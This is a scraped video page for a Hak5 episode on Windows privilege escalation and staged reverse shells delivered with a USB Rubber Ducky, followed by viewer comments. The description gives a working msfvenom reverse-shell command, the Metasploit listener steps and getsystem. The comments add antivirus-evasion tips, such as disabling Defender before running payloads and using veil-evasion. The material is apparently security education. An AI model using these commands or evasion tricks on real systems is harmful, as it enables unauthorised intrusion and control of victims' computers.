Escalating Privileges in Windows & Staged Reverse Shells - Hak5 2117
Вставка
- Опубліковано 9 лют 2025
- Hak5 -- Cyber Security Education, Inspiration, News & Community since 2005:
____________________________________________
Privilege escalation on Windows, Meterpreter Reverse Shells and Staged Payloads with the USB Rubber Ducky. All that and more, this time on Hak5.
-------------------------------
Shop: www.hakshop.com
Support: / threatwire
Subscribe: / hak5
Our Site: www.hak5.org
Contact Us: / hak5
------------------------------
Check out / threatwire for our Patreon-only Audio RSS feed of Threat Wire!
git clone github.com/Ski...
cd UAC-D-E-Rubber-Ducky
python uac-duck.py
Upload UAC-Duck-Payload.vbs to your host
Create the inject.bin payload file from our DuckyScript.txt using ducktoolkit.com and load it on the MicroSD card for the USB Rubber Ducky
We'll be using msfvenom to generate an executable reverse shell. Mubix has covered this in greater detail on Metasploit Minute - so check those episodes out.
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.230.133 LPORT=4444 -f exe -o bob.exe
Next we'll upload it to the online host we specified in the python builder script
msfconsole
use exploit/multi/handler
set LHOST 192.168.230.133
set LPORT 4444
set ExitOnSession false
exploit -j
sessions
sessions -i 1
shell
whoami
exit
getsystem
shell
whoami
exit
screenshot
github.com/Ski...
Enter our December giveaway! Details here: hakshop.com/pa...
Shannon’s going to CES! Gonna have a meetup during the trade show in Vegas: www.facebook.c...
We will be at Shmoocon!
~-~~-~~~-~~-~
Please watch: "Bash Bunny Primer - Hak5 2225"
• Bash Bunny Primer - Ha...
~-~~-~~~-~~-~
____________________________________________
Founded in 2005, Hak5's mission is to advance the InfoSec industry. We do this through our award winning educational podcasts, leading pentest gear, and inclusive community - where all hackers belong. - Наука та технологія
Feeling honored having my generator shown off here, thanks a bunch!! :) Released offline version today much easier and faster to generate! :)
GG bro!
+Siddie Tech
I just download your code. Nice work.
Dude lovely code! Keep up the great work...
Haven't seen this show in a while but glad to see the quality hasn't changed. Great stuff by some great hosts! Thanks!
about that sticker, bière rutten interieurbrouw, it seems to be a word play on the name of an interior designer/company in the Netherlands: Pierre Rutten Interieubouw. In french the words bière and broue = beer. To be more precise broue is the foam on a liquid. They also reversed the original company logo.
Search UA-cam for Pierre Rutten Interieurbouw chainsaw massacre. (Brouw = brew in Dutch.)
She really struggled with that pronunciation!
this is the best episode yet, thank you.
Great episode! Once again thanks guys!
LOVE your videos watch them all keep up the work guys!
is there more information about the getsystem command on how it works and how it escalates the privilage?
Hi Shannon and Daren. I was watching your videos on how to build a 250g drone since I wanted to build one for myself. But it seems that you guys never got to do the part of converting the drone into a FPV drone. I was wondering if you guys continued the steps on your forums or just something.
If not, would you recommend a website, video forum, etc. where i could get the information to add the fpv add-ons to the drone you guys built. Thanks in advance!
Was the cow session set to UTF-* charset?
So i tried this targeting a 64 bit machine. I had to change the -a to x64 and i also had to change the payload to windows/x64/meterpreter/reverse_tcp ... Everything worked correctly, however when I plugged the ducky into the target machine... It all popped up in powershell... then it succesfully hid itself like in the video.... But after waiting for a couple minutes... Nothing happened on my MSF.... No shell was caught? Is there a reason for this? ... I decided to run the command my self, so i copy and pasted it from the ducks .bin file... So I oppened powershell and copy and pasted it in, and it came back all red and the error was > "The given path format is not supported"
So... Unrelated question.... I was signed up to be notified when the field kit was available again, I didn't receive an email yet but I did notice that it was possible to back order it right now and I just thought that I would mention to you that it's a good idea to send that email now and let people start paying because money! P. S. I'll be buying mine soon as well!
3:33 what's with that single frame?
samramdebest it's just a frame of Shannon alone in the studio facing the camera
I think something about their workflow does this occasionally, I've seen it before.
Just Shannon getting ready for the show with her good friends Jack Daniels and Sam Adams.
1st. Not a drunk. Just like beer.
2nd. Yeah, it's a glitch in the recording. Haven't had time to fix it and sometimes we miss the glitch while editing.
you're alright.
Question, my win 10 build numbers are in the 10,000 range, what is "1607"?
would this work if the target in question had UAC, configured via GPO? seems like this would not resolve on a binded computer. please point me out if I'm wrong. Thanks.
Turning powershell on by default was a mistake. Always disable ms defender via powershell before running payloads.
can't wait for my usb rubber ducky!!!! ordered 2 days ago, but in italy the shipping is slooooooooow
u will love it bro i have one!
MrCoInSanity i'm thinking of buying also a LAN turtle
Guitar Lori Yeah ive been looking at that to and how it works is really cool
MrCoInSanity what are you using your Rubber ducky for?
Guitar Lori
Both the rubber ducky and the LAN turtle are awesome
I'm thinking of getting a pineapple
Great attack. I tested it with DuckHunter HID on a Kali Nethunter Galaxy S5. All the steps are the same except I just load the actual DuckyScript.txt which the phone encodes from there.
I also just hosted the files with SimpleHTTPServer which is already built into Kali. Pretty damn fast attack and so damn effective! I'm impressed and will be using this..
also, a heads up, My 360 Total Security AV did not flag the intrusions but Malwarebytes did.. Not sure what to do about that. Veil-evasion payloads maybe?
Jason Kriewaldt you can also try using reverse_https instead, it doesn't get flagged as often
Angus Stanton that's exactly what I was going to try.. but then got side tracked.. I'll mess with it more later with updates on how a https payload works against malwarebytes.. unless you try it first. ;)
An https payload didn't work for me, not even a veil-evasion created one.. it sent stages but never opened a session... but I tried using veil-evasion with a python/meterepeter/reverse_tcp payload and it worked great, not only did it open without alerting Malwarebytes or AV but it was pretty quick to send me back a session to msfconsole running in a terminal on my nethunter phone.
I literally went from plug in phone to session on phone within 5 seconds of running the script... So amazing.
Where is @Mubix? It's been a while, I miss him...
Edit: I love how after 11 years you guys still explain everything so simply for noobs to understand... xD
I must be dealing with a odd ball Windows 7 installation because unless I cd to powershell's directory powershell commands are not reconized..
Where did you get the golden pineapple in the background?
why the date from the computer show 12-15-2016 ? is vídeo old ?
Im running my web host using apache and everything redirects correctly, howver when I run the payload on the windows box, it does not give me a shell. I made sure my ip's and ports were correct, and I also made sure all the file names are correct. Could it be that Windows Defender detects bob.exe?
Update: If I allow bob.exe to run with Windows Defender off then the payload works fine. I guess this doesn't work unless Windows Defender is off lol.
I love you guys !!
What type of web server do you have running because don't you have to make a sub domain for ggg.txt r u using Apache? I use nginx and I can't seem to get it to work.
You can host the plaintext on pastebin if you use "/raw/" :)
just bought a USB Rubber Ducky what should I try
Next video show how to get around IDS and IPS and what kinds of things those systems look for in the traffic.
Probably a dumb question, you have to open port 4444 (or whichever was specified in the payload) on the router/firewall the meterpreter machine is sitting behind each time right? Or... leave it open all the time? Is this insecure in any way? Port 4444 on your DSL/Cable modem as well would have to be opened if they have a firewall, correct? Is there an easier way?
Lee Beezy It's a little more than that. If you want to run this on a your home network and the objective is not on the same network the connection must go through your router and end on the 4444 port of your computer. To do this you must configure port redirection on the router (I think that's the name). I recommend renting a cheap server and making tests there, I don't usually like messing arround with my router.
Ok thanks, as I thought... Yes, it's tedious fiddling with port filtering/triggering and, I really dislike opening incoming ports to begin with. I've looked at a VPS in the past but remember them being pretty pricey. Is there a cheaper option, maybe one without all the bells and whistles that would suit basic purposes you or anyone would recommend?
Lee Beezy pretty easy to open a port just > go to nat setting > set trigger port and start port to 4444 then direct it to your computer i.p address > enable and save job done .
if your freaked out by opening a port on your main router (all your main computers lan) get a second and run it through the wan port of your main router and open the port on this instead (physical network segregation) so any inbound traffic will only have access to your 2nd router on port 4444 and no access to your main router .
You can do what Philip says, but if you wanna try a VPS check this out www.ovh.com/us/vps/vps-ssd.xml It's quite cheap and it's more than enough for starters.
You'll have to 'forward' a port on your router to a port on your local machine. Your payload will then need to refer to the public ip of your router and the port you've opened on that router (LHOST and LPORT).
==> portforward.com for more info on how to forward a port on your router to your local system's port.
==> www.whatismyip.com to see your public IP
Note that most routers have a variable public IP, which can change every day, on each reboot, or practically never. So be sure to double check your public IP every time you want to set up a reverse shell
Definitely close/disable the port forward when you no longer need it, open ports can lead to vulnerabilities being exploited on your network.
Also, I highly suggest you don't run a listener on a pc that's being used for anything personal. Use a separate pc for that, or like a Raspberry Pi you SSH into.
Better yet would be to rent a VPS where you have control over port forwards etc to keep your home network separated of anything you're trying to do that might be close to less-than-legal.
Could someone help me out? They were talking about having a web server for either routing metasploit or receiving a shell from the exploited shell. I understand DK's AWS website for hosting his files. However, I cannot find a server for this cloud machine to host meterpreter shells. If someone could tell me how to do this or give me a name of a provider that'd be amazing.
One good starting place for learning how to use cloud instances in pen testing (inc. to receive reverse shells) is to play around a bit with the Kali Linux images that are now available in the OS image catalogs on both AWS and Azure. That said, if all you really are looking to do is to use Metasploit to receive and control shells all you need is a Virtual Private Server provider who offers Ubuntu or other common Linux images that Metasploit will work on. Which is all of those providers, essentially. But using a Kali image on AWS or Azure gives you Metasploit and other common tools (and their dependencies) already in place and ready for use.
That's assuming you're at already at least somewhat familiar with using Kali locally on your own machine (in a VM) or in a test network environment; if not, you definitely want to get familiar with Kali to some degree on your own equipment before you start worrying about setting up a VPS instance in the cloud and trying out operations over the actual internet.
Are you doing some Fight club style hidden messages? Darren is missing from the frame at 3:33, are you trying to tell us something?
I sensed it,how did you pause it to catch it.
off point but what do you all think of usb mice for laptop's?
Shannon and Darren look much better than those hipsters on Watch_Dogs 2...
How can i purchase a rubber ducky
Oh yea. The skulls where you get the skill points is the pinapple wifi. Hope you guys still do this when you are 80 years old and just thx
Sorry to be picky but I think you’re thinking about Saturn V rocket not an atlas V rocket
You can also bypass UAC by creating a scheduled task with Admin Privileges just once
nicholas 007 well you need administrator rights once and then you can open your desired exe on startup or a custom trigger
nicholas 007 you should be able to use this web method that opens a new administrator cmd to create a new user and give it administrator privileges
nicholas 007 No you have to have physical access
Look into PDQ deploy!
Hello how should this attack works beyond a proxy?
Lucas Miguel bulletproof web hosting. Unless it has a static ip and can have a specific port, port forwarded that would be ideal.
AV always kills my MSVenom payloads. I have found that veil evasion is undetected by Windows Defender
You guys are great. I gotta say tho, Metasploit is the Sub7 of the future. lol I gotta say most of what Metasploit automates is too advanced for me as of now anyway. Can you do a show on dll's and maybe how to manually hijack them? I want to know more. :)
So, would this be considered a form of Windows Atom Bombing?
You even do not need a Rubber Ducky to achieve this. It works with a Digispark too. You just need to run different scripts. A Digispark costs 1-3 $.
pentestit.de/digispark-die-usb-rubber-ducky-alternative-teil2/
Oh wow you guys are still doing HAK5 ... I've watched you way back in the beginning, and I'm happy to say I still have a crush on Shannon
what i think sucks about reverse shell is that you leave you ip like.. hey you found my shell now come sue me
That promo for domain.com has a lot of "and get this"
hak5 but the content-aware scale gets stronger at 17:07
I have good luck when using veil.
that random glitch at 3:33 lol
thank you so much ... if only it was possible to ship rubber ducky to my contry morocco... i follow up with the tutorial and use arduino micro
Does DK wear contacts or does he have laser vision?
ifconfig is deprecated. Use ip a. It's shorter and correct.
1:44 Darren was so intense while drinking that... XD LOOK AT HIS EYES!
why running screenshot use reversevnc just rc that thing
lol Daron is a kandy kid ! Im really paying mind till now lol... awesome
Hi Darren!
Drunk looking snubs at 3:33
Microsoft called.... Oh thats gonna be a fun call
few rogue frames at 3:33
im seeing that aswell
its actually an accidentally changed angle of filming
yeh it changes to another screen
Maybe it is time to change all of your GNUPG key-chains to 8192 bytes (65536 bits) long keep the hackers out, I hope that this is just for educational purposes only and is not to be used to break the law otherwise you might wind up on Death Row, Stop these hacks use a firewall like PFSense and keep it up to date.
Check your escalation privileges
Washtogs 2! Such a good game
it works
probably should encode that payload... even windows defender will pick up that trojan straight from msfvenom....
1. GetSysInfo gets system data like Darren said. 2nd those were markers, i only know cause we used to have those :D
did you guys here about X.exe for privilege escalation?
cool
Love RUBBER DUCKY
check your privileges.
12:35 aardwolf... like the MUD?
Am I the only one who really hates threat wire simply because Patric Norton is an annoying old guy who doesn't know that much about tech and has hopped shows way too much?
Patrick is no longer on Threat Wire. It's now fully produced by me! - Shannon
Oh cool.
Atlas V rocket to the moon? guess you'r confusing Saturn V (1968) and Atlas V (2002). so I believe the AtlasV could reach the moon
Rocket fail 😔🚀
Darren Kitchen Sad Trombone
ok
damn it! samramdebest beat me to it lol 3:33
why does he wear a gang sign haha...
clap
I made it 2.5 second
*claps once*
pls ship to Isreal !!!
thx a lot... i didn't knew something like this existed
stop drink. that not cool
I thought it said white privilege escalation lol
doge is first bitches
Doge I love your work :D